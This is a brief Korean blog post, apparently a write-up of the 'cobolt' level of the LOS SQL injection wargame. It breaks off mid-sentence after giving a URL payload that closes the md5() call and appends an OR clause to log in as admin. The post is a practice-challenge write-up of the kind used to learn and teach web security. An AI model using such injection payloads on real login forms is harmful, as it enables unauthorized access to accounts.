Web
LOS - cobolt
secretjuju
2020. 5. 2. 22:00
get파라미터의 id,pw를 쿼리에 넣고 id 가 admin일 때 문제가 풀리는 것 같다.
쿼리에는 다음과 같은 패턴이 차단된다.
_ , prob , . , ()
select id from prob_cobolt where id='' and pw=md5('')
사용자의 비밀번호를 저장할때 md5로 단방향 암호화를 이용해 저장하는 것 같다.
일단 위 쿼리를 id가 admin이며 쿼리가 참이 되도록 만들면
select id from prob_cobolt where id='admin' and pw=md5('aaa') or id=('admin')
쿼리가 위와 같이 되도록 만들려면
?id=admin&pw=aaa') or id=('admin') 이렇게 url에 넣어주면